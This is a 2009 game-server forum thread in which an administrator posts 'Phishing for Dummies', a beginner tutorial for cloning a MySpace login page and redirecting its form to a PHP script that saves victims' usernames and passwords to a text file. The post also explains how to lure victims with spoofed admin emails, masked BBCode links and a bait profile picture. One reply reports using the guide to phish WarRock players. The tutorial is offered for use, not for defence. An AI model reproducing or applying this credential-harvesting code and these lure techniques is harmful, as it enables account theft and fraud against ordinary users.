PicoScape
NEW FORUMS:
www.picoscape.net/forum

These forums will close down in 3 days.

Pico & Svizy

Join the forum, it's quick and easy

PicoScape
NEW FORUMS:
www.picoscape.net/forum

These forums will close down in 3 days.

Pico & Svizy
PicoScape
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Server Status
Latest topics
» How to get income through affiliate programs.
by IzaiahCafiso Sat Mar 26, 2011 5:10 am

» Website
by PK JOSH Fri Jul 17, 2009 2:54 pm

» ATTENTION: NEW FORUMS
by Turkey Mon Jul 13, 2009 6:53 pm

» Are You Bored when the server is Offline?
by skeith│TheNextJesus™®©│ Sun Jul 12, 2009 12:40 pm

» PicoScape Price Guide!
by Limitless Sat Jul 11, 2009 4:34 pm

» Bluchaos promoted
by Limitless Sat Jul 11, 2009 4:27 pm

» another webclient background?
by illiterate Sat Jul 11, 2009 12:24 pm

» Censor
by skeith│TheNextJesus™®©│ Sat Jul 11, 2009 11:18 am

» P.S.M.C.
by Mod Fox Fri Jul 10, 2009 7:50 pm

» New webclient background?
by skeith│TheNextJesus™®©│ Fri Jul 10, 2009 6:24 pm

» what do you guys think of..
by bl00d filthy Fri Jul 10, 2009 3:22 pm

» The Stick Figures Series
by States Fri Jul 10, 2009 12:41 pm

» P.S.M.C. & skeith needs help [ bored ppl look here] (:
by skeith│TheNextJesus™®©│ Fri Jul 10, 2009 12:14 pm

» Welcome to PicoScape Wars!
by illiterate Fri Jul 10, 2009 9:38 am

» Windows Live Messanger.
by illiterate Thu Jul 09, 2009 5:35 pm

» Lamps
by skeith│TheNextJesus™®©│ Thu Jul 09, 2009 5:11 pm

» Clan P.S.M.C. Is Always Looking For Allies!
by skeith│TheNextJesus™®©│ Thu Jul 09, 2009 5:09 pm

» Hey! I'm Lauren!
by skeith│TheNextJesus™®©│ Thu Jul 09, 2009 5:07 pm

» 62 waves of jad
by skeith│TheNextJesus™®©│ Thu Jul 09, 2009 5:04 pm

» The United Members of Pwn
by Mod Fox Thu Jul 09, 2009 4:59 pm

» Guardians of the 9th Division
by Mod Fox Thu Jul 09, 2009 4:58 pm

» Server restart
by illiterate Thu Jul 09, 2009 1:15 pm

» IMPORTANT!! READ!!! READ!!!
by bl00d filthy Thu Jul 09, 2009 2:39 am

» RS Buddies!
by wolfy Thu Jul 09, 2009 1:50 am

» My account Reset
by Bluchaos | GOT9D Thu Jul 09, 2009 12:31 am

» What about our charaters in the beta?
by illiterate Wed Jul 08, 2009 10:24 pm

» Hack passwords with an USB Drive
by States Wed Jul 08, 2009 9:56 pm

» PicoScape V1 Comeing Out Soon!
by wolfy Wed Jul 08, 2009 5:55 pm

» How To Kill The Theif!
by Bluchaos | GOT9D Wed Jul 08, 2009 5:52 pm

» Welcome to PicoScape Clans!
by Bluchaos | GOT9D Wed Jul 08, 2009 5:46 pm

» Almost ready!
by wolfy Wed Jul 08, 2009 5:45 pm

» My Stats
by skeith│TheNextJesus™®©│ Wed Jul 08, 2009 4:23 pm

» King Black Dragon
by skeith│TheNextJesus™®©│ Wed Jul 08, 2009 4:20 pm

» Bots/Macros
by bl00d filthy Wed Jul 08, 2009 6:18 am

» Okay..
by bl00d filthy Wed Jul 08, 2009 6:16 am

» Bronze/Silver/Gold members
by illiterate Tue Jul 07, 2009 10:53 pm

» Item database
by skeith│TheNextJesus™®©│ Tue Jul 07, 2009 9:05 pm

» Clue Scrolls!
by skeith│TheNextJesus™®©│ Tue Jul 07, 2009 9:03 pm

» rares
by Bluchaos | GOT9D Tue Jul 07, 2009 2:43 pm

» You Now Can Download The Client
by States Tue Jul 07, 2009 12:09 pm

Advertisments
Affiliates
VOTE FOR US

Vote on the RuneScape Top 200
RuneScape Top 200 - Cheat Free Sites, Gold, and More

 

Phishing for Dummies

5 posters

Go down

Phishing for Dummies Empty Phishing for Dummies

Post by Pico Sun May 03, 2009 3:50 pm

Phishing for Dummies

Phishing Tutorurial


1. Intro

There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.spam.com/index.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.

What do we need to change?

What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:

Code:
<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUwY3RsMDAkT​WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGwwMCRNYWluJFNwbGFza​ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" />
</div>

and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.

Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
Code:
action="login.php"
and save the file.

Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:

Code:
<?php
header ('Location: http://myspace.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).

Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.spam.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.spam.com/passwords.txt
Or you may access it from your account.

Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.

4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.

How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing this:

[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
For example, www.google.com looks like a google, but it leads you to yahoo when you click it.

If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.
Like this:

Code:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's self explainable once you see it.
There are many other ways, and as I said, your creativity is the limit.

5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a phisher, and how it works. Although is written for Myspace, the procedure is equivalent for almost every other login site(for hotmail is different). After this, it's up to you to explore, experiment and dive in the world of social engineering.

Pico
Administrator
Administrator

Posts : 117
Join date : 2009-05-03
Location : Nederlands

http://picoscape.net

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Turkey Sun May 03, 2009 3:54 pm

So at what step to I use the rod and bait? I didn't really catch any of this. All this hacking stuff sounds fishy.
Razz Kidding...
Turkey
Turkey
Administrator
Administrator

Posts : 285
Join date : 2009-05-03
Age : 30
Location : USA

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Limitless Tue May 12, 2009 5:02 am

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

LOL Turkey- u reli DO have Turkey Brains- Na JKS


Good Guide Pico, Ty
Limitless
Limitless
Super Moderator
Super Moderator

Posts : 210
Join date : 2009-05-10

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Turkey Tue May 12, 2009 4:09 pm

Wink Super intelligent turkey brains...
Turkey
Turkey
Administrator
Administrator

Posts : 285
Join date : 2009-05-03
Age : 30
Location : USA

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Limitless Wed May 13, 2009 1:26 am

<Space Turkey!!!>

With Super-Turkey Forum Skillz


o.o
Limitless
Limitless
Super Moderator
Super Moderator

Posts : 210
Join date : 2009-05-10

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Turkey Wed May 13, 2009 8:19 am

Yep. *shows Forum Skillcape* Razz
Turkey
Turkey
Administrator
Administrator

Posts : 285
Join date : 2009-05-03
Age : 30
Location : USA

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Limitless Thu May 14, 2009 2:29 am

Hang on thats a good idea!

Make a Forum Skillcape!!!

need a certain amount of posts, once u reach that many an admin, prolly Pico, will give to you. Idk if shud be tradable or not tho =]
Limitless
Limitless
Super Moderator
Super Moderator

Posts : 210
Join date : 2009-05-10

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Augdog98 Thu May 21, 2009 4:33 pm

I made my first phising site for warrock with this, its not too hard if you had a responding brain.
Augdog98
Augdog98
Super Moderator
Super Moderator

Posts : 105
Join date : 2009-05-21
Location : California

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Walzmfront Mon May 25, 2009 7:55 am

Fairly simple concept...

Walzmfront
New Player

Posts : 3
Join date : 2009-05-25

Back to top Go down

Phishing for Dummies Empty Re: Phishing for Dummies

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum